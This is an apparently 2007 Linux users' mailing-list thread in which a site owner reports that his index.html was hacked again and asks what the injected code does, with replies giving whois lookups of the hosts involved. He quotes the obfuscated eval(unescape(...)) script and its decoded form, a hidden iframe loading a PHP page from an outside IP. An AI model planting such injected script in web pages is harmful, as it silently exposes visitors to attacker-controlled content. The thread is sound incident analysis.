[ale] I've been hacked!

Robert L. Harris nomad at rdlg.net
Wed Nov 21 18:48:34 EST 2007 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


This is actually a nasty malware that's been out for about 6 months.
It's part of one of the ugly spam networks.


Adrin wrote:
> NICE!!!!
> 
> When you click on the link.  You get forwarded to another place instead.
> It doesn't do anything on a Linux machine using firefox. the page
> appears to be blank. 
> http://72.232.116.12/~futured/frt23.php?'+Math.round(Math.random()*46683)+'a9b%5c' 
> 
> And a whois 72.232.116.12
> 
> OrgName:    Layered Technologies, Inc. 
> OrgID:      LAYER-3
> Address:    5085 W Park Blvd
> Address:    Suite 700
> City:       Plano
> StateProv:  TX
> PostalCode: 75093
> Country:    US
> 
> ReferralServer: rwhois://rwhois.layeredtech.com:4321
> 
> NetRange:   72.232.0.0 - 72.233.127.255 
> CIDR:       72.232.0.0/16, 72.233.0.0/17 
> NetName:    LAYERED-TECH-
> NetHandle:  NET-72-232-0-0-1
> Parent:     NET-72-0-0-0-0
> NetType:    Direct Allocation
> NameServer: NS1.LAYEREDTECH.COM
> NameServer: NS2.LAYEREDTECH.COM
> Comment:    Please send all abuse complaints to
> Comment:    abuse at layeredtech.com
> RegDate:    2005-09-07
> Updated:    2007-02-27
> 
> RTechHandle: JPS66-ARIN
> RTechName:   Suo-Anttila, Jeremy Paul
> RTechPhone:  +1-972-398-7998
> RTechEmail:  jps at layeredtech.com 
> 
> OrgAbuseHandle: LAT-ARIN
> OrgAbuseName:   LT Abuse Team 
> OrgAbusePhone:  +1-972-398-7998
> OrgAbuseEmail:  abuse at layeredtech.com
> 
> OrgNOCHandle: LIT-ARIN
> OrgNOCName:   LT IP-Network Team 
> OrgNOCPhone:  +1-972-398-7998
> OrgNOCEmail:  ipnet at layeredtech.com
> 
> OrgTechHandle: LNT3-ARIN
> OrgTechName:   LT NOC Team 
> OrgTechPhone:  +1-972-398-7998
> OrgTechEmail:  ipnet at layeredtech.com
> 
> # ARIN WHOIS database, last updated 2007-11-20 19:10
> # Enter ? for additional hints on searching ARIN's WHOIS database.
> 
> 
> Found a referral to rwhois.layeredtech.com:4321.
> 
> %rwhois V-1.5:001eff:00 rwhois.layeredtech.com (by Network Solutions,
> Inc. V-1.5.7.3)
> network:Class-Name:network
> network:ID:ORG-LAYER-3.72.232.0.0/16
> network:Auth-Area:72.232.0.0/16
> network:Network-Name:72.232.116.1/25
> network:IP-Network:72.232.116.1/25
> network:Organization;I:romansemenchuk.com
> network:Org-Name:romansemenchuk.com
> network:Street-Address:Private Residence contact abuse at layeredtech.com
> for details
> network:City:Kharkov
> network:State:of Kharkov
> network:Postal-Code:61052
> network:Country-Code:UA
> network:Phone:972-398-7998
> network:Tech-Contact;I:hostmaster at layeredtech.com
> network:Admin-Contact;I:support at layeredtech.com
> network:Abuse-Contact;I:abuse at layeredtech.com
> network:Created:20070257
> network:Updated:20070257
> network:Updated-By:hostmaster at layeredtech.com
> 
> 
> 
> 
> On Wed, 2007-11-21 at 18:33 -0500, Adrin wrote:
>> whois 69.73.146.142
>>
>> OrgName:    Jaguar Technologies LLC 
>> OrgID:      JTL-8
>> Address:    4201 SW Freeway suite#216
>> City:       Houston
>> StateProv:  TX
>> PostalCode: 77027
>> Country:    US
>>
>> NetRange:   69.73.128.0 - 69.73.191.255 
>> CIDR:       69.73.128.0/18 
>> NetName:    JAGUAR-TECHNOLOGIES-NOC
>> NetHandle:  NET-69-73-128-0-1
>> Parent:     NET-69-0-0-0-0
>> NetType:    Direct Allocation
>> NameServer: NS.NOCDIRECT.COM
>> NameServer: NS2.NOCDIRECT.COM
>> Comment:    NOCDIRECT
>> RegDate:    2003-11-05
>> Updated:    2005-04-15
>>
>> RAbuseHandle: ABUSE370-ARIN
>> RAbuseName:   Abuse 
>> RAbusePhone:  +1-713-960-1502
>> RAbuseEmail:  abuse at jaguarpc.com 
>>
>> OrgTechHandle: GL538-ARIN
>> OrgTechName:   Landis, Greg 
>> OrgTechPhone:  +1-832-279-5529
>> OrgTechEmail:  greg at jaguarpc.com
>>
>> # ARIN WHOIS database, last updated 2007-11-20 19:10
>> # Enter ? for additional hints on searching ARIN's WHOIS database.
>>
>> I seem to recall that IIS has/had a hosting bug of some type.  From what
>> I remember one virtual hosting domain could infect another on the same
>> server.  I wish I could remember were I read about it.  I remember
>> mostly that is was a RED HAT hosting site that had switch to M$ because
>> of SCO Lawyers.
>>
>>
>>
>> On Wed, 2007-11-21 at 06:57 -0500, Jim Lynch wrote:
>>> Last summer I received notification from Google that a web page on one 
>>> of my web hosting accounts was infected with some sort of malware bug. 
>>>
>>> This account only has ftp access so I changed the password for the one 
>>> and only ftp account and removed the offending code from my index.html 
>>> file.  I also added a cron job to another site to compare a good 
>>> index.html with the one on the site that had been hacked in case they 
>>> came back.
>>>
>>> They did.
>>>
>>> Today I received a message that said the compare failed and found the 
>>> following at the top of the body in my index.html file:
>>>
>>> <script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%37%62%37%33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%36%39%2e%37%33%2e%31%34%36%2e%31%34%32%2f%7e%61%62%6f%75%6e%64%69%6e%2f%69%6d%61%67%65%73%2f%66%72%74%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%34%36%36%38%33%29%2b%27%61%39%62%5c%27%20%77%69%64%74%68%3d%33%35%31%20%68%65%69%67%68%74%3d%31%33%33%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); 
>>> </script>
>>>
>>> That script, unescaped looks like:
>>>
>>> window.status='Done';document.write('<iframe name=7b73 
>>> src=\'http://69.73.146.142/~aboundin/images/frt.php?'+Math.round(Math.random()*46683)+'a9b\' 
>>> width=351 height=133 style=\'display: none\'></iframe>'
>>>
>>> Has anyone seen anything like this before?  I wonder what  sort of evil 
>>> function it might perform?
>>>
>>> I also wonder how they got access the second time?  I went through the 
>>> cgi scripts on that system to be sure they were mine. There aren't any 
>>> php files on the system.
>>>
>>> I attempted to look up the ip address but nslookup said it didn't exist, 
>>> however it pings and the index.html file from it is the default apache2 
>>> index file.  I suspect that system has been hacked as well.
>>>
>>> Note the incident from last Summer was a different one.
>>>
>>> Thanks,
>>> Jim.
>>>
>>>
>>> _______________________________________________
>>> Ale mailing list
>>> Ale at ale.org
>>> http://www.ale.org/mailman/listinfo/ale
>> _______________________________________________
>> Ale mailing list
>> Ale at ale.org
>> http://www.ale.org/mailman/listinfo/ale
> 
> _______________________________________________
> Ale mailing list
> Ale at ale.org
> http://www.ale.org/mailman/listinfo/ale

- --

:wq!
-
---------------------------------------------------------------------------
Robert L. Harris                     | GPG Key ID: E344DA3B
                                         @ x-hkp://pgp.mit.edu
DISCLAIMER:
      These are MY OPINIONS             With Dreams To Be A King,
       ALONE.  I speak for              First One Should Be A Man
       no-one else.                       - Manowar

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHRMPH8+1vMONE2jsRAnryAJ9mbRqf2WYxT56xw/Od9/Ieo7b94gCcCV4F
G7VplQ4jN2msvxFuWcso3iU=
=o2xa
-----END PGP SIGNATURE-----

More information about the Ale mailing list